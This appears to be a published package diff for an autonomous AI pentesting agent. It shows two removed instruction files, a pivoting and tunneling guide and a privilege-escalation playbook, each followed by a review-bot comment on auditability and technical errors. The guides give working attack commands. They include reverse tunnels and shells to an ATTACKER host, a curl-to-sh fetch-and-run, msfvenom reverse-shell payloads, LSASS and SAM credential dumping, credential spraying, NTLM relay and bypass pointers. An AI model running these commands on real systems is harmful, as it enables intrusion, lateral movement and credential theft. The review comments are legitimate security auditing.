pentesting 0.73.13 → 0.90.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +120 -44
- package/bin/pentesting.mjs +32 -0
- package/lib/runtime.mjs +419 -0
- package/package.json +17 -46
- package/scripts/postinstall.mjs +30 -0
- package/scripts/preflight-local.sh +24 -0
- package/dist/ad/prompt.md +0 -60
- package/dist/agent-tool-KHXXTHGS.js +0 -989
- package/dist/api/prompt.md +0 -63
- package/dist/chunk-4UNNRHYY.js +0 -5797
- package/dist/chunk-GILD75OT.js +0 -11407
- package/dist/chunk-S5ZMXFHR.js +0 -1162
- package/dist/cloud/prompt.md +0 -49
- package/dist/container/prompt.md +0 -58
- package/dist/database/prompt.md +0 -58
- package/dist/email/prompt.md +0 -44
- package/dist/file-sharing/prompt.md +0 -56
- package/dist/ics/prompt.md +0 -76
- package/dist/main.d.ts +0 -1
- package/dist/main.js +0 -9777
- package/dist/network/prompt.md +0 -49
- package/dist/persistence-U2N3KWFH.js +0 -13
- package/dist/process-registry-4Y3HB4YQ.js +0 -30
- package/dist/prompts/base.md +0 -436
- package/dist/prompts/ctf-crypto.md +0 -168
- package/dist/prompts/ctf-forensics.md +0 -182
- package/dist/prompts/ctf-pwn.md +0 -137
- package/dist/prompts/evasion.md +0 -215
- package/dist/prompts/exploit.md +0 -416
- package/dist/prompts/infra.md +0 -114
- package/dist/prompts/llm/analyst-system.md +0 -76
- package/dist/prompts/llm/context-extractor-system.md +0 -19
- package/dist/prompts/llm/input-processor-system.md +0 -64
- package/dist/prompts/llm/memory-synth-system.md +0 -14
- package/dist/prompts/llm/playbook-synthesizer-system.md +0 -10
- package/dist/prompts/llm/reflector-system.md +0 -16
- package/dist/prompts/llm/report-generator-system.md +0 -21
- package/dist/prompts/llm/strategist-fallback.md +0 -9
- package/dist/prompts/llm/triage-system.md +0 -47
- package/dist/prompts/main-agent.md +0 -193
- package/dist/prompts/offensive-playbook.md +0 -250
- package/dist/prompts/payload-craft.md +0 -181
- package/dist/prompts/post.md +0 -185
- package/dist/prompts/recon.md +0 -296
- package/dist/prompts/report.md +0 -98
- package/dist/prompts/strategist-system.md +0 -472
- package/dist/prompts/strategy.md +0 -163
- package/dist/prompts/techniques/README.md +0 -40
- package/dist/prompts/techniques/ad-attack.md +0 -261
- package/dist/prompts/techniques/auth-access.md +0 -256
- package/dist/prompts/techniques/container-escape.md +0 -103
- package/dist/prompts/techniques/crypto.md +0 -296
- package/dist/prompts/techniques/enterprise-pentest.md +0 -175
- package/dist/prompts/techniques/file-attacks.md +0 -144
- package/dist/prompts/techniques/forensics.md +0 -313
- package/dist/prompts/techniques/injection.md +0 -217
- package/dist/prompts/techniques/lateral.md +0 -128
- package/dist/prompts/techniques/network-svc.md +0 -229
- package/dist/prompts/techniques/pivoting.md +0 -205
- package/dist/prompts/techniques/privesc.md +0 -190
- package/dist/prompts/techniques/pwn.md +0 -595
- package/dist/prompts/techniques/reversing.md +0 -183
- package/dist/prompts/techniques/sandbox-escape.md +0 -73
- package/dist/prompts/techniques/shells.md +0 -194
- package/dist/prompts/vuln.md +0 -190
- package/dist/prompts/web.md +0 -318
- package/dist/prompts/zero-day.md +0 -298
- package/dist/remote-access/prompt.md +0 -52
- package/dist/web/prompt.md +0 -59
- package/dist/wireless/prompt.md +0 -62
|
@@ -1,205 +0,0 @@
|
|
|
1
|
-
# Pivoting & Multi-Hop Tunneling — Autonomous Guide
|
|
2
|
-
|
|
3
|
-
> **Cross-ref**: lateral.md (movement), ad-attack.md (AD pivoting), network-svc.md (internal services)
|
|
4
|
-
|
|
5
|
-
## Core Principle
|
|
6
|
-
|
|
7
|
-
Pivoting = using a compromised host as a relay to reach previously unreachable network segments.
|
|
8
|
-
The agent on the **outer host** can only reach the **inner network** through a pivot chain.
|
|
9
|
-
|
|
10
|
-
---
|
|
11
|
-
|
|
12
|
-
## Pivot Decision Tree
|
|
13
|
-
|
|
14
|
-
```
|
|
15
|
-
GOT SHELL ON HOST? → Run immediately:
|
|
16
|
-
ip a / ifconfig → list interfaces (look for 2+ NICs = pivot candidate)
|
|
17
|
-
ip route / route -n → routing table (internal subnets)
|
|
18
|
-
arp -a → visible hosts (discovered via ARP)
|
|
19
|
-
cat /etc/hosts → hardcoded internal names
|
|
20
|
-
netstat -an → internal listening services
|
|
21
|
-
ss -tlnp → listening ports (Linux)
|
|
22
|
-
|
|
23
|
-
FOUND INTERNAL SUBNET (e.g. 10.10.100.0/24)?
|
|
24
|
-
→ Port scan via pivot: nmap through socks proxy or chisel
|
|
25
|
-
→ Identify services → exploit from outer agent via tunnel
|
|
26
|
-
|
|
27
|
-
FOUND INTERNAL HOST NAMES?
|
|
28
|
-
→ DNS resolution from pivot: dig @internal-DNS hostname
|
|
29
|
-
→ Look for: DC, DB, git, admin, intranet, mail
|
|
30
|
-
```
|
|
31
|
-
|
|
32
|
-
---
|
|
33
|
-
|
|
34
|
-
## Method 1: SSH Tunneling (if SSH available on pivot)
|
|
35
|
-
|
|
36
|
-
```
|
|
37
|
-
LOCAL PORT FORWARD — access pivot's localhost from attacker:
|
|
38
|
-
ssh -L 8080:127.0.0.1:80 user@PIVOT
|
|
39
|
-
→ Now: http://localhost:8080 = http://PIVOT:80
|
|
40
|
-
|
|
41
|
-
REMOTE PORT FORWARD — expose attacker port through pivot:
|
|
42
|
-
ssh -R 0.0.0.0:4444:127.0.0.1:4444 user@PIVOT
|
|
43
|
-
→ From PIVOT: nc attacker 4444 reaches attacker's local 4444
|
|
44
|
-
|
|
45
|
-
DYNAMIC SOCKS PROXY — route arbitrary traffic through pivot:
|
|
46
|
-
ssh -D 1080 user@PIVOT
|
|
47
|
-
→ proxychains / nmap --proxies socks4://127.0.0.1:1080 INTERNAL_TARGET
|
|
48
|
-
|
|
49
|
-
MULTI-HOP (3 hops):
|
|
50
|
-
ssh -J user@HOP1,user@HOP2 user@FINAL_TARGET
|
|
51
|
-
ssh -L 8080:INTERNAL:80 -J user@HOP1 user@HOP2
|
|
52
|
-
```
|
|
53
|
-
|
|
54
|
-
---
|
|
55
|
-
|
|
56
|
-
## Method 2: Chisel (No SSH Required — TCP over HTTP)
|
|
57
|
-
|
|
58
|
-
```
|
|
59
|
-
ATTACKER SIDE (server):
|
|
60
|
-
chisel server --port 8080 --reverse
|
|
61
|
-
|
|
62
|
-
PIVOT SIDE (client — upload chisel binary):
|
|
63
|
-
chisel client ATTACKER:8080 R:socks → SOCKS5 on attacker:1080
|
|
64
|
-
chisel client ATTACKER:8080 R:4444:10.10.100.5:22 → forward specific port
|
|
65
|
-
|
|
66
|
-
MULTI-HOP chisel:
|
|
67
|
-
HOP1 connects to attacker → SOCKS on attacker:1080
|
|
68
|
-
HOP2 connects to HOP1 via proxychains → SOCKS chain
|
|
69
|
-
|
|
70
|
-
USAGE with proxychains:
|
|
71
|
-
echo "socks5 127.0.0.1 1080" >> /etc/proxychains4.conf
|
|
72
|
-
proxychains nmap -sT -Pn -p 22,80,443,445,3389 10.10.100.0/24
|
|
73
|
-
proxychains evil-winrm -i 10.10.100.5 -u admin -p pass
|
|
74
|
-
```
|
|
75
|
-
|
|
76
|
-
---
|
|
77
|
-
|
|
78
|
-
## Method 3: Ligolo-ng (Kernel TUN — fastest, cleanest)
|
|
79
|
-
|
|
80
|
-
```
|
|
81
|
-
ATTACKER (proxy):
|
|
82
|
-
sudo ip tuntap add user $USER mode tun ligolo
|
|
83
|
-
sudo ip link set ligolo up
|
|
84
|
-
./proxy -selfcert
|
|
85
|
-
|
|
86
|
-
PIVOT (agent — upload binary):
|
|
87
|
-
./agent -connect ATTACKER:11601 -ignore-cert
|
|
88
|
-
|
|
89
|
-
ATTACKER — after agent connects:
|
|
90
|
-
session → select agent
|
|
91
|
-
listener_add --addr 0.0.0.0:1234 --to 10.10.100.5:22 → port forward
|
|
92
|
-
start → add route: sudo ip route add 10.10.100.0/24 dev ligolo
|
|
93
|
-
→ Now: ssh admin@10.10.100.5 directly (no proxychains!)
|
|
94
|
-
|
|
95
|
-
MULTI-HOP with ligolo:
|
|
96
|
-
Agent on HOP1 → reach HOP2 network
|
|
97
|
-
Upload agent to HOP2 → connect through ligolo listener on HOP1
|
|
98
|
-
web_search("ligolo-ng double pivot setup multi-hop")
|
|
99
|
-
```
|
|
100
|
-
|
|
101
|
-
---
|
|
102
|
-
|
|
103
|
-
## Method 4: Metasploit Route / SOCKS
|
|
104
|
-
|
|
105
|
-
```
|
|
106
|
-
meterpreter session on pivot:
|
|
107
|
-
background
|
|
108
|
-
use post/multi/manage/autoroute
|
|
109
|
-
set SESSION 1 → run
|
|
110
|
-
|
|
111
|
-
Then:
|
|
112
|
-
use auxiliary/server/socks_proxy → set VERSION 5 → run
|
|
113
|
-
→ proxychains through Metasploit SOCKS on 127.0.0.1:1080
|
|
114
|
-
|
|
115
|
-
portfwd in meterpreter:
|
|
116
|
-
portfwd add -l 3389 -p 3389 -r INTERNAL_HOST
|
|
117
|
-
→ rdesktop localhost:3389
|
|
118
|
-
```
|
|
119
|
-
|
|
120
|
-
---
|
|
121
|
-
|
|
122
|
-
## Method 5: Netcat / Socat Relay (No binary upload — abuse existing tools)
|
|
123
|
-
|
|
124
|
-
```
|
|
125
|
-
NETCAT RELAY (if mkfifo available):
|
|
126
|
-
mkfifo /tmp/pipe
|
|
127
|
-
nc -l -p 4444 < /tmp/pipe | nc INTERNAL_TARGET 22 > /tmp/pipe
|
|
128
|
-
|
|
129
|
-
SOCAT RELAY:
|
|
130
|
-
socat TCP-LISTEN:4444,fork TCP:INTERNAL_TARGET:22
|
|
131
|
-
→ Persistent relay: socat TCP-LISTEN:4444,fork,reuseaddr TCP:TARGET:22
|
|
132
|
-
|
|
133
|
-
SOCAT SOCKS PROXY (if socat version supports it):
|
|
134
|
-
socat TCP-LISTEN:1080,fork SOCKS4A:localhost:INTERNAL_HOST:PORT,socksport=1080
|
|
135
|
-
```
|
|
136
|
-
|
|
137
|
-
---
|
|
138
|
-
|
|
139
|
-
## Internal Network Scanning via Pivot
|
|
140
|
-
|
|
141
|
-
```
|
|
142
|
-
VIA PROXYCHAINS (any pivot method):
|
|
143
|
-
proxychains nmap -sT -Pn -p 22,80,443,445,1433,3306,3389,5985,6379,8080 INTERNAL/24
|
|
144
|
-
proxychains nmap -sT -Pn --top-ports 100 INTERNAL/24
|
|
145
|
-
|
|
146
|
-
BASH PING SWEEP (when no tools):
|
|
147
|
-
for i in $(seq 1 254); do ping -c1 -W1 10.10.100.$i &>/dev/null && echo "10.10.100.$i UP"; done
|
|
148
|
-
|
|
149
|
-
BASH PORT SCAN (when no tools):
|
|
150
|
-
for port in 22 80 443 445 3389 5985; do
|
|
151
|
-
(echo >/dev/tcp/10.10.100.5/$port) 2>/dev/null && echo "$port OPEN"
|
|
152
|
-
done
|
|
153
|
-
```
|
|
154
|
-
|
|
155
|
-
---
|
|
156
|
-
|
|
157
|
-
## Reverse Shell Through Pivot
|
|
158
|
-
|
|
159
|
-
```
|
|
160
|
-
DOUBLE PIVOT — get shell from deep internal host back to outside:
|
|
161
|
-
|
|
162
|
-
Method A: Chisel reverse
|
|
163
|
-
Outer SOCKS → proxychains + outer listener
|
|
164
|
-
Inner host connects outbound (if egress allowed):
|
|
165
|
-
chisel client ATTACKER:8080 R:4445:127.0.0.1:4445
|
|
166
|
-
|
|
167
|
-
Method B: Meterpreter bind shell
|
|
168
|
-
proxychains exploit/multi/handler (PAYLOAD: bind_tcp on INTERNAL_HOST)
|
|
169
|
-
lhost=INTERNAL_HOST → proxychains connect inbound
|
|
170
|
-
|
|
171
|
-
Method C: SSH -R through existing session
|
|
172
|
-
From inner host: ssh -R 9001:127.0.0.1:9001 pivot_user@PIVOT
|
|
173
|
-
From attacker: nc PIVOT:9001
|
|
174
|
-
|
|
175
|
-
Reverse shell via proxy (if internal host has egress):
|
|
176
|
-
→ Set attacker IP as destination (should reach PIVOT, then routed back)
|
|
177
|
-
→ Verify connectivity: proxychains curl http://ATTACKER:8080/test
|
|
178
|
-
```
|
|
179
|
-
|
|
180
|
-
---
|
|
181
|
-
|
|
182
|
-
## Credential Spray Across Pivoted Networks
|
|
183
|
-
|
|
184
|
-
```
|
|
185
|
-
Once you have credentials from the outer network → always spray internally:
|
|
186
|
-
proxychains crackmapexec smb 10.10.100.0/24 -u user -p pass --continue-on-success
|
|
187
|
-
proxychains crackmapexec winrm 10.10.100.0/24 -u user -p pass
|
|
188
|
-
proxychains impacket-psexec DOMAIN/user:pass@INTERNAL_HOST
|
|
189
|
-
|
|
190
|
-
Credential relay internally:
|
|
191
|
-
proxychains impacket-ntlmrelayx -t INTERNAL_TARGET -smb2support
|
|
192
|
-
Coerce auth from pivot: PetitPotam, PrinterBug, MS-RPRN
|
|
193
|
-
```
|
|
194
|
-
|
|
195
|
-
---
|
|
196
|
-
|
|
197
|
-
## Search Patterns
|
|
198
|
-
|
|
199
|
-
```
|
|
200
|
-
web_search("chisel multi-hop pivot {year}")
|
|
201
|
-
web_search("ligolo-ng double pivot internal network")
|
|
202
|
-
web_search("proxychains nmap internal network scanning")
|
|
203
|
-
web_search("pivot {OS} tunneling no binary upload")
|
|
204
|
-
web_search("reverse shell through pivot NAT traversal")
|
|
205
|
-
```
|
|
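Review bot: nothing in this diff replaces the 205 lines removed here, and the file list shows the same for every other dist/ file (main.js, the chunk-*.js bundles, every prompts/*.md and */prompt.md), while package/bin/pentesting.mjs, package/lib/runtime.mjs and package/scripts/postinstall.mjs are added. A published bundle shrinking to a thin runtime plus an install hook is the change a consumer auditing 0.90.1 most needs explained, because the operator instructions the agent pivots with are no longer readable from the tarball. Please document in README.md where these technique files now live (bundled elsewhere, generated by runtime.mjs, or fetched at install or run time) and, if fetched, pin the source to a version or content hash so the behaviour installed is the behaviour that was reviewed. If the text is being relocated rather than dropped, two lines should not travel unchanged: `socat TCP-LISTEN:1080,fork SOCKS4A:localhost:INTERNAL_HOST:PORT,socksport=1080` does not make socat a SOCKS server, since SOCKS4A is a client-side address (`SOCKS4A:<socks-server>:<host>:<port>`) and this invocation connects back into its own listener; and `ssh -R 0.0.0.0:4444:127.0.0.1:4444 user@PIVOT` only binds a non-loopback address on the pivot when its sshd has `GatewayPorts yes`, otherwise it silently binds 127.0.0.1, so the check on the following line should be run against the pivot's own bound port (`nc 127.0.0.1 4444` on PIVOT) rather than `nc attacker 4444`, which bypasses the tunnel entirely.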
@@ -1,190 +0,0 @@
|
|
|
1
|
-
# Privilege Escalation — Comprehensive Autonomous Guide
|
|
2
|
-
|
|
3
|
-
> **§3 Minimal Specification**: This file is a **Bootstrap reference**, not a prescribed order.
|
|
4
|
-
> Do NOT follow steps linearly. Use `get_owasp_knowledge`, `web_search`, and target observations
|
|
5
|
-
> to decide what to test and in what order. Adapt dynamically — not to this list.
|
|
6
|
-
|
|
7
|
-
> **Cross-ref**: shells.md (shell access), post.md (post-exploitation), lateral.md (lateral movement)
|
|
8
|
-
|
|
9
|
-
## Core Principle
|
|
10
|
-
Initial access is usually low-privileged. Privesc is MANDATORY.
|
|
11
|
-
There are hundreds of privesc vectors — automated tools + manual checks + SEARCH.
|
|
12
|
-
|
|
13
|
-
## 🐧 Linux Privilege Escalation
|
|
14
|
-
|
|
15
|
-
### Automated Enumeration (RUN FIRST)
|
|
16
|
-
```
|
|
17
|
-
ALWAYS run automated enumeration:
|
|
18
|
-
├── LinPEAS: curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
|
|
19
|
-
├── LinEnum: web_search("linenum github") → download and run
|
|
20
|
-
├── linux-exploit-suggester: web_search("linux exploit suggester github")
|
|
21
|
-
├── pspy: monitor processes without root (cron jobs, other users' commands)
|
|
22
|
-
└── If tools can't be transferred: run commands manually (see below)
|
|
23
|
-
```
|
|
24
|
-
|
|
25
|
-
### Manual Privesc Vector Map
|
|
26
|
-
```
|
|
27
|
-
LINUX PRIVESC CATEGORIES:
|
|
28
|
-
│
|
|
29
|
-
├── 1. Kernel Exploits
|
|
30
|
-
│ ├── uname -a → kernel version
|
|
31
|
-
│ ├── web_search("linux kernel {version} privilege escalation exploit")
|
|
32
|
-
│ ├── searchsploit linux kernel {version}
|
|
33
|
-
│ └── Dirty COW, Dirty Pipe, OverlayFS, etc.
|
|
34
|
-
│
|
|
35
|
-
├── 2. SUID/SGID Binaries
|
|
36
|
-
│ ├── find / -perm -4000 -type f 2>/dev/null (SUID)
|
|
37
|
-
│ ├── find / -perm -2000 -type f 2>/dev/null (SGID)
|
|
38
|
-
│ ├── For EACH found binary: check GTFOBins
|
|
39
|
-
│ │ web_search("{binary_name} gtfobins")
|
|
40
|
-
│ ├── Custom SUID binaries: strings, ltrace, strace → find vulnerability
|
|
41
|
-
│ └── Known exploitable SUID: nmap, vim, python, find, bash, cp, mv, etc.
|
|
42
|
-
│
|
|
43
|
-
├── 3. Sudo Misconfiguration
|
|
44
|
-
│ ├── sudo -l (list what current user can sudo)
|
|
45
|
-
│ ├── (ALL, !root) → CVE-2019-14287: sudo -u#-1 /bin/bash
|
|
46
|
-
│ ├── NOPASSWD entries → check GTFOBins for each allowed command
|
|
47
|
-
│ ├── sudo version: sudo --version → web_search("sudo {version} CVE")
|
|
48
|
-
│ ├── LD_PRELOAD/LD_LIBRARY_PATH in env_keep → shared library injection
|
|
49
|
-
│ └── web_search("sudo {command} privilege escalation gtfobins")
|
|
50
|
-
│
|
|
51
|
-
├── 4. Cron Jobs
|
|
52
|
-
│ ├── cat /etc/crontab, ls -la /etc/cron.*, crontab -l
|
|
53
|
-
│ ├── Writable cron scripts → replace with reverse shell
|
|
54
|
-
│ ├── Wildcard injection: if cron uses * → inject flag files
|
|
55
|
-
│ │ tar: --checkpoint + --checkpoint-action=exec=sh
|
|
56
|
-
│ │ rsync: -e "sh shell.sh"
|
|
57
|
-
│ ├── PATH exploitation: cron PATH writable → place malicious binary first
|
|
58
|
-
│ └── pspy to discover hidden cron jobs and service activity
|
|
59
|
-
│
|
|
60
|
-
├── 5. Capabilities
|
|
61
|
-
│ ├── getcap -r / 2>/dev/null
|
|
62
|
-
│ ├── Exploitable: cap_setuid, cap_dac_override, cap_sys_admin, cap_net_raw
|
|
63
|
-
│ ├── Python with cap_setuid: python -c 'import os; os.setuid(0); os.system("/bin/bash")'
|
|
64
|
-
│ └── web_search("{binary} {capability} privilege escalation")
|
|
65
|
-
│
|
|
66
|
-
├── 6. Writable Files/Directories
|
|
67
|
-
│ ├── /etc/passwd writable → add root user (openssl passwd -1 -salt xyz password)
|
|
68
|
-
│ ├── /etc/shadow readable → crack hashes (hashcat/john)
|
|
69
|
-
│ ├── .bashrc/.profile of other users → inject commands
|
|
70
|
-
│ ├── Service config files → modify service to run as root
|
|
71
|
-
│ ├── init scripts/systemd services writable → modify ExecStart
|
|
72
|
-
│ └── find / -writable -type f 2>/dev/null | grep -v proc
|
|
73
|
-
│
|
|
74
|
-
├── 7. Path Hijacking
|
|
75
|
-
│ ├── echo $PATH → are writable dirs BEFORE system dirs?
|
|
76
|
-
│ ├── Service/script calls command without absolute path → create in writable dir
|
|
77
|
-
│ ├── LD_LIBRARY_PATH → shared library hijacking
|
|
78
|
-
│ └── Python library path → create malicious module with same name
|
|
79
|
-
│
|
|
80
|
-
├── 8. NFS Misconfiguration
|
|
81
|
-
│ ├── cat /etc/exports → look for no_root_squash
|
|
82
|
-
│ ├── Mount from attacker → create SUID binary → execute on target
|
|
83
|
-
│ └── Web_search("NFS no_root_squash privilege escalation")
|
|
84
|
-
│
|
|
85
|
-
├── 9. Docker/Container Escape
|
|
86
|
-
│ ├── In docker group? → docker run -v /:/mnt --rm -it alpine chroot /mnt sh
|
|
87
|
-
│ ├── Privileged container? → mount /dev/sda1 /mnt → access host filesystem
|
|
88
|
-
│ ├── Docker socket mounted? → full host access
|
|
89
|
-
│ ├── cap_sys_admin → mount cgroup + notify_on_release → execute on host
|
|
90
|
-
│ └── web_search("docker container escape privilege escalation {year}")
|
|
91
|
-
│
|
|
92
|
-
├── 10. Sensitive Information
|
|
93
|
-
│ ├── grep -r "password" /var/www/ /opt/ /home/ /etc/ 2>/dev/null
|
|
94
|
-
│ ├── .env files, config files, database connection strings
|
|
95
|
-
│ ├── .bash_history, .mysql_history, .sh_history
|
|
96
|
-
│ ├── SSH keys: find / -name "id_rsa" -o -name "*.pem" 2>/dev/null
|
|
97
|
-
│ ├── Stored credentials: /var/www/html/wp-config.php, .git/config
|
|
98
|
-
│ └── Internal services with credentials → pivot to higher-priv user
|
|
99
|
-
│
|
|
100
|
-
└── 11. Miscellaneous
|
|
101
|
-
├── Shared library injection via writable .so files
|
|
102
|
-
├── AppArmor/SELinux misconfiguration → bypass
|
|
103
|
-
├── dbus exploitation
|
|
104
|
-
├── Polkit vulnerabilities (CVE-2021-4034 pkexec, CVE-2021-3560)
|
|
105
|
-
└── web_search("linux privilege escalation {year} new techniques")
|
|
106
|
-
```
|
|
107
|
-
|
|
108
|
-
## 🪟 Windows Privilege Escalation
|
|
109
|
-
|
|
110
|
-
### Automated Enumeration
|
|
111
|
-
```
|
|
112
|
-
├── WinPEAS: upload and run (or run from memory via PowerShell)
|
|
113
|
-
├── PowerUp.ps1: Invoke-AllChecks
|
|
114
|
-
├── Seatbelt.exe: comprehensive security enumeration
|
|
115
|
-
├── SharpUp.exe: check for common privesc vectors
|
|
116
|
-
└── windows-exploit-suggester: compare systeminfo output
|
|
117
|
-
```
|
|
118
|
-
|
|
119
|
-
### Manual Privesc Vector Map
|
|
120
|
-
```
|
|
121
|
-
WINDOWS PRIVESC CATEGORIES:
|
|
122
|
-
│
|
|
123
|
-
├── 1. Kernel Exploits
|
|
124
|
-
│ ├── systeminfo → OS version + patch level
|
|
125
|
-
│ ├── web_search("windows {version} {build} privilege escalation exploit")
|
|
126
|
-
│ ├── windows-exploit-suggester --update --systeminfo sysinfo.txt
|
|
127
|
-
│ └── Notable: PrintNightmare, HiveNightmare, EternalBlue, JuicyPotato, etc.
|
|
128
|
-
│
|
|
129
|
-
├── 2. Service Exploits
|
|
130
|
-
│ ├── Unquoted service paths: wmic service get name,pathname | findstr /i "C:"
|
|
131
|
-
│ ├── Weak service permissions: sc qc <service>, accesschk.exe
|
|
132
|
-
│ ├── Service binary replacement: replace binary of service running as SYSTEM
|
|
133
|
-
│ ├── DLL Hijacking: missing DLL → place malicious DLL in search path
|
|
134
|
-
│ └── Registry permissions: writable service registry keys
|
|
135
|
-
│
|
|
136
|
-
├── 3. Token Impersonation
|
|
137
|
-
│ ├── SeImpersonatePrivilege → JuicyPotato/PrintSpoofer/GodPotato
|
|
138
|
-
│ ├── SeAssignPrimaryTokenPrivilege → token manipulation
|
|
139
|
-
│ ├── whoami /priv → check all privileges
|
|
140
|
-
│ └── web_search("windows token impersonation SeImpersonate exploit {year}")
|
|
141
|
-
│
|
|
142
|
-
├── 4. AlwaysInstallElevated
|
|
143
|
-
│ ├── Check: reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
|
|
144
|
-
│ ├── If enabled → create malicious .msi → runs as SYSTEM
|
|
145
|
-
│ └── msfvenom -p windows/shell_reverse_tcp ... -f msi > evil.msi
|
|
146
|
-
│
|
|
147
|
-
├── 5. Stored Credentials
|
|
148
|
-
│ ├── cmdkey /list → stored credentials
|
|
149
|
-
│ ├── runas /savecred /user:admin "cmd /c reverse_shell.exe"
|
|
150
|
-
│ ├── SAM/SYSTEM backup files → dump hashes
|
|
151
|
-
│ ├── LSASS dump: mimikatz, Task Manager, procdump
|
|
152
|
-
│ ├── Registry: reg save HKLM\SAM sam, reg save HKLM\SYSTEM system
|
|
153
|
-
│ ├── Credential Manager, DPAPI protected blobs
|
|
154
|
-
│ └── web_search("windows credential extraction techniques {year}")
|
|
155
|
-
│
|
|
156
|
-
├── 6. Scheduled Tasks
|
|
157
|
-
│ ├── schtasks /query /fo LIST /v
|
|
158
|
-
│ ├── Writable task scripts → replace with malicious code
|
|
159
|
-
│ ├── Writable task binary paths → replace binary
|
|
160
|
-
│ └── Missing binaries → create malicious binary at expected path
|
|
161
|
-
│
|
|
162
|
-
├── 7. Registry Exploits
|
|
163
|
-
│ ├── AutoRun: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
|
|
164
|
-
│ ├── Writable registry keys → modify
|
|
165
|
-
│ └── AppInit_DLLs, Image File Execution Options
|
|
166
|
-
│
|
|
167
|
-
├── 8. UAC Bypass
|
|
168
|
-
│ ├── web_search("UAC bypass technique {year}")
|
|
169
|
-
│ ├── fodhelper.exe bypass, eventvwr.exe bypass
|
|
170
|
-
│ ├── DLL side-loading in auto-elevated processes
|
|
171
|
-
│ └── UACME github → comprehensive UAC bypass collection
|
|
172
|
-
│
|
|
173
|
-
└── 9. Miscellaneous
|
|
174
|
-
├── AMSI bypass → web_search("AMSI bypass {year}")
|
|
175
|
-
├── AppLocker bypass → web_search("AppLocker bypass {year}")
|
|
176
|
-
├── Network credential sniffing (Responder, Inveigh)
|
|
177
|
-
├── Clipboard monitoring for passwords
|
|
178
|
-
└── web_search("windows privilege escalation {year} new techniques")
|
|
179
|
-
```
|
|
180
|
-
|
|
181
|
-
## Universal Privesc Search Pattern
|
|
182
|
-
```
|
|
183
|
-
1. What OS/version? → web_search("{OS} {version} privilege escalation")
|
|
184
|
-
2. What services? → web_search("{service} privilege escalation")
|
|
185
|
-
3. What binaries? → web_search("{binary} gtfobins") OR web_search("{binary} lolbas")
|
|
186
|
-
4. What's misconfigured? → interpret LinPEAS/WinPEAS output
|
|
187
|
-
5. What's writable? → modify writable files/services for shell execution
|
|
188
|
-
6. What credentials? → crack, spray, or reuse found credentials
|
|
189
|
-
7. Still stuck? → web_search("{kernel_version} exploit CVE PoC")
|
|
190
|
-
```
|
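Review bot: the `curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh` line removed here is exactly the kind of fetch-and-execute instruction a reviewer needs to be able to read, and with this file gone (and dist/ as a whole) no text in the tarball states what the agent will download or run; the same review gap now applies to the added package/scripts/postinstall.mjs and package/scripts/preflight-local.sh, which run on the installing machine at `npm install` time, not on a target. Please add a README.md section listing what postinstall executes and whether it reaches the network, and keep the agent's instruction text inspectable in the package so `npm diff` can surface changes to it the way it did for this release. Separately, if privesc.md is being moved rather than dropped, the `Notable: PrintNightmare, HiveNightmare, EternalBlue, JuicyPotato, etc.` entry under "1. Kernel Exploits" is misfiled: none of these is a local kernel exploit (PrintNightmare is a Print Spooler service bug, HiveNightmare is an over-permissive ACL on the SAM/SYSTEM/SECURITY hives, JuicyPotato is token impersonation and is already listed under "3. Token Impersonation", and EternalBlue is a remote SMB exploit, not local escalation), and the unquoted-path check `wmic service get name,pathname | findstr /i "C:"` matches every service on the drive, so it needs a filter such as `findstr /i /v "C:\Windows\\" | findstr /i /v """` before it identifies anything useful.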